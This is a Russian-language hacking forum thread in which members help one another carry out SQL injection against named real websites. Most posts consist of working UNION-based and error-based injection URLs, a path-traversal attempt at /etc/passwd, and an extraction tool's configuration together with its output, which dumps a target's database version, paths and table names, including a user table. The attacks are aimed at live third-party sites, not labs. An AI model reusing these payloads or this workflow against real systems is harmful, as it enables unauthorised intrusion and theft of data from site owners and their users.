Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134

    вот статья одного парня, желательно прочесть:
     
    1 person likes this.
  2. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    От души бро !
     
  3. SnooPy

    SnooPy New Member

    Joined:
    16 Dec 2009
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    так вроде нет sql инъекции просто ошибка
     
  4. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    375
    Reputations:
    22
    Переменная в число кажется преобразовывается, ничего сделать нельзя.
     
    2 people like this.
  5. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    Парни подскажите хорошую статью о проведении sqli в Oracle .
     
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Pashkela как ты обошел фильтрацию, чтобы вытянуть это:

    user(): hdn_bo_user@orinoco.venred.com
    database(): lavozi_lavozindependiente_com_-_db
    version(): 5.1.44


    http://www.lavozindependiente.com/microsite.php?cha=66+order+by+3+--+

    http://www.lavozindependiente.com/microsite.php?cha=-66+union+select+1,2,3+--+

    Я пробовал, у меня не получается.
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну там же явно написано, крутил как слепую, по правилам (классическим) blind sql injection, для получения системной информации не требуется ни union, ни select
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/thread40576.html
    https://forum.antichat.ru/thread162060.html
    https://forum.antichat.ru/thread161670.html
     
    1 person likes this.
  9. G1G

    G1G Banned

    Joined:
    4 Jun 2009
    Messages:
    24
    Likes Received:
    7
    Reputations:
    0
    deleted
     
    #12129 G1G, 3 Apr 2010
    Last edited: 3 Apr 2010
    1 person likes this.
  10. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    тут данные можно вывести ?
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,547
    Likes Received:
    1,242
    Reputations:
    273
    2daniel_1024
    http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,version(),database(),user(),@@version_compile_os))),4,5,6--
     
    1 person likes this.
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ))
     
  13. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Я вижу запрос в адресную строку типа:
    http://mihadmin.ru/statpage.php?sid=love

    Подставляю вместо нее другой запрос:
    http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd

    На что система мне выдает:
    http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
    Но если пытаюсь работать боле глубже
    http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться

    Вообщем, если ли тут иньекция?
    Инклуд или скуль?
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2))from(statpage)+group+by+2)a)--+
    
    ))
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    инклуд нету потому что love это значение колонки "сид" в бд, а не файл
     
    _________________________
    #12135 Konqi, 3 Apr 2010
    Last edited: 3 Apr 2010
  16. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Понял.
    Тогда почему используется функция
    (select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+

    Кодирование это понятно, только почему в такой последовательности и "--+" - какое имеет значение для уязвимого запроса?
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Ershik.

    "--+" - плюсом "обрезают комментарий"
     
  18. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Понятно.
    Я хочу выяснить наименование столбцов и полей.
    По типу:
    http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
    :
    Произвожу иньекцию, подобно этой:
    http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(TABLE_NAME)),floor(rand(0)*2))from(statpage)+FROM
    +INFORMATION_SCHEMA.TABLES+LIMIT+1,1)a)--+

    Я не совсем понимаю механизм заключения все в concat и floor

    Существует какой-то онлайн сервис или программа для преобразования?
    Как с его помощью можно вытащить названия таблиц, полей?
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    тыцк

    Code:
    $method = 0; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
    $f_table = "statpage";
    $f_url = "http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from"; # url
    $f_plus = "+"; # 
    $f_filtr = "a)--+";
    
    Code:
    System information:
    -----------------------------------------
    ver:5.0.51a-24+lenny2
    datadir:/var/lib/mysql/
    os:debian-linux-gnu
    base:mihadmin_main
    basedir:/usr/
    tmpdir:/tmp
    -----------------------------------------
    Tables in information_schema.tables - 27
    -----------------------------------------
    COLLATIONS
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    article
    const
    group
    group_refer
    menu
    rights
    statpage
    CHARACTER_SETS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    PROFILING
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    news
    rights_refer
    user
    
     
    1 person likes this.
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    997
    Likes Received:
    905
    Reputations:
    587
    Посмотри тут пример: https://forum.antichat.ru/showpost.php?p=1802753&postcount=21
     
Loading...
Thread Status:
Not open for further replies.